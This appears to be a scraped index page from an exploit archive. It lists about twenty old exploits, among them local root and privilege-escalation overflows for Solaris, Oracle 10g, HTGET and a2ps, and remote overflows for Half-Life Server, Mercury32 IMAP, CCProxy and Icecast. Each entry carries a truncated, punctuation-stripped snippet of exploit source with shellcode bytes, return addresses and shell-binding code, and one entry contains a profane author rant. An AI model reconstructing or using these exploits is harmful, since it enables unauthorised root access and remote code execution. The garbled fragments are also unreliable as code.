Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)

Exploit for unknown platform in category local exploits ================================================================= Oracle 10g PROCESSDUPHANDLE Local Privilege Elevation win32 ================================================================= // Argeniss - Information Security // // Oracle...

Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit

No description provided by source. include stdio.h include unistd.h / /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl...

xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)

No description provided by source. / xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003 http://www.debian.org/security/2003/dsa-356 / include stdlib.h define RETADDR 0xbfffff11 define DEFAULTBUFFERSIZE 29 define DEFAULTEGGSIZE 512 define NOP 0x90 define BIN...

ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27 Simple analysis The vulnerability is another one of pregreplace+/e vulnerability,代码 在 \sources\actionadmin\search.php line 1 2 5 8-1 2 6 a 2: if $this-ipsclass-input'lastdate' $this-outp...

Serial Line Sniffer 0.4.4 Buffer Overflow

Original can be found at http://shellcoders.com/sintigan/slsnif-ploit.pl Author: [email protected] http://www.shellcoders.com/ ---------------------------------------- Program ID: Serial Line Sniffer 0.4.4 sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl sh-3.00 id uid=0root...

Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit

Exploit for linux platform in category remote exploits ======================================================= Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit ======================================================= / hoagiehlserver.c Remote exploit for Halflife-Servers. Binds a shell to...

GNU a2ps - Anything to PostScript Not SUID Local Overflow

/ Not added to Local Non Poc section /str0ke / include include include // by lizard / lizstyleatgmail.com // greets go to slider/trog for helpin me // not suid by default ; define VULNTHING "/usr/bin/a2ps" define DEFRET 0xbffffffa - strlensc - strlenVULNTHING define xnullbitch 1100 //im not a asm...

HTGET 0.9.x - Local Privilege Escalation

HTGET 0.9.x - Local Privilege Escalation !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...

HTGET <= 0.9.x Local Root Exploit

No description provided by source. !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...

Aspell (word-list-compress) Command Line Stack Overflow

No description provided by source. / Fuck private exploits . Fuck iranian hacking and security !! teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366atyahoodotcom word-list-compress is not setuid . ...

Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow (3)

Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow 3 Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET,...

CCProxy Log - Remote Stack Overflow

include include include pragma commentlib, "ws232" unsigned char EndChar= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/1.0 unsigned char shellcode = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" "xe8xedxffxffxff" / 254 bytes shellcode, xor with 0xee / / offset 92=IP offset 99=PORT/...

Icecast <= 2.0.1 Win32 Remote Code Execution Exploit (modded)

Exploit for unknown platform in category remote exploits ============================================================= Icecast include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include include endif define VER "0.1" define PORT 80...

Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)

!/bin/sh The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw The crafted JPEG header makes Windows crash a couple of different ways 1 First, it crashes when the image is opened. 2 Second, it crashes when hovering the mouse over the image. The pointer overwrite is pretty...

Horde-Chora: Remote code execution

Background Chora is a PHP-based SVN/CVS repository viewer by the HORDE project. Description A vulnerability in the diff viewer of Chora allows an attacker to inject shellcode. An attacker can exploit PHP's file upload functionality to upload a malicious binary to a vulnerable server, chmod it as...

Xsok v1.02 "-xsokdir" local buffer overflow game exploit

Exploit for linux platform in category local exploits ======================================================== Xsok v1.02 "-xsokdir" local buffer overflow game exploit ======================================================== / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded ...

shatterCommCtrl.txt

Intro ----- Brett Moore from Security Assesment put me onto this one. XP's Visual Styles, the feature that makes various controls in Windows XP look a less dated, also introduce a new shatter type vulnerability into the OS. Vuln ------- Applications which have the new XPified appearance use...

Solaris Runtime Linker (SPARC) - ld.so.1 Local Buffer Overflow

Solaris Runtime Linker SPARC - ld.so.1 Local Buffer Overflow / ld.so.1 exploit SPARC coded by: osker178 bjr213 psu.edu Alright, so this exploits a fairly standard buffer overflow in the default Solaris runtime linker ld.so.1 discovery by Jouko Pynnonen Only real deviation here from the standard...

Shatter XP

Intro ----- Brett Moore from Security Assesment put me onto this one. XP's Visual Styles, the feature that makes various controls in Windows XP look a less dated, also introduce a new shatter type vulnerability into the OS. Vuln ------- Applications which have the new XPified appearance use...

shatterSEH3.txt

============================================================================ = Shattering SEH III = = [email protected] = http://www.security-assessment.com = = Originally posted: September 29, 2003 ============================================================================ ==...